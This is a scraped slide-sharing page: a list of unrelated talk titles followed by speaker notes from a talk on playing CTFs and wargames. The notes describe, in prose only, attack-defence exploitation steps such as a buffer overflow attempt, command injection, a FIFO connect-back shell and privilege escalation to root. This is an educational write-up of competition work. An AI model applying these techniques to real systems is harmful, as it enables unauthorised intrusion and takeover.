The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 

Último (20)

Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 

Playing CTFs for Fun & Profit

Notas del editor

  1. Version 1.2
  2. I’ve been playing CTFs for around 2 years now.
  3. Who has played a CTF before? How about wargames?
  4. Who here has played a CTF before? And how about wargames?
  5. Next to look at some wargames sites
  6. Pick a link
  7. The links show different images. Interesting.
  8. Trying to view page source
  9. Trying to view the admin directory. What files control basic authentication?
  10. I’m not going to go through this binary challenge, but it does give you an idea of the level of tutorial in some games.
  11. This is the typical wargames experience.
  12. There are lots of wargames around – I have some specific recommendations at the end
  13. Often same kinds of challenges as wargames. Lots of exploitation!By “progressive” I mean that you can generally attempt any tasks rather than having to complete “easier” ones first.
  14. Challenge-based also called “jeopardy” style
  15. After this, let’s look at some CTF scoreboards
  16. From these values we can brute-force calculate the initial seed. Thanks to Paco Hope for a great DC4420 talk on randomness!Then we can start the program, give it that seed, and see for each hand whether we’ll win or lose. We need ONE BILLION DOLLARS to win.
  17. So when we win, this code is reached. Can anyone see how we’d actually exploit this?
  18. Running on port 443, simple web interface.
  19. Enter whatever text you want, choose a “language”, hit submit
  20. Click to show random text highlighted.Recon shows that the “keys” are entered as pastes and then checked again later.
  21. Digging into how pastie works
  22. The “defence” side is something you don’t get in wargames or challenge CTFs, so this was all new to me
  23. Ran mysql against my instance to figure out the query needed to get data out.
  24. And that’s the pastie service done 
  25. Where to start? Just browsing through piles of incomprehensible ruby.
  26. Let’s verify that this does what it looks like it does.No 250 response code, just closes the connection.
  27. So how to exploit? I want to get the keys out.
  28. It doesn't seem to respond to much
  29. I love binary exploitation. I used to think I was ok at it.
  30. What does it actually do?
  31. Who can name a dangerous C function?
  32. Classic SBO, surely this gives remote pre-auth code execution?
  33. Nope
  34. Welcome to CTF rage. Remember this buffer here? Well before we return from the function it gets written to. But we've nuked whatever value is there, so the program tries to write to junk memory, and crashes.
  35. Memory map of auth process
  36. When we add the implicit zeroes in, we can see that all of the writable memory addresses have zeroes in them. And since our exploitation path is via strcpy, we can’t put nulls in the address because we need to keep overwriting up to the return address.
  37. Now for my l33t exploit. Nope. Out of time.
  38. Apache, running on port 3000
  39. Found the ruby code being run. It looks like it monitors other services.
  40. It can also get hashes of files. Can anyone guess what the exploit is yet?
  41. It can also get hashes of files. Can anyone guess what the exploit is yet?
  42. Semicolons didn’t work, I’m not entirely sure why. Elegance is not the aim!
  43. Trick to use FIFOs to create a connectback shell. Urlencodes to a bit of a mouthful.
  44. We start a listener
  45. Defense in depth! At this point I can basically go raiding all the keys from any machine, unless they’ve changed several passwords.
  46. Last one changes them back to their home directory before each command.
  47. We’re hackers. Go root or go home.
  48. You've got a shell, now what?They've changed the password, so sudo doesn't work!What can we edit, configuration-wise?
  49. Auth runs as root. We can make something else run as root. How about our connect-back code?
  50. How do we go about making auth restart? Lame DoS. Root.
  51. Just give it a go. Try some wargames. You will get stuck. Persist!For CTFs, find some buddies, maybe here @ Bsides, and get a team together!
  52. Everyone knows you shouldn’t trust client-side data. These plugins help you make client-side data particularly untrustworthy.
  53. Bandit isn’t really much of a wargame – it will give you some Linux skills which will be useful though 
  54. I like learning, I enjoy it. Some people like money.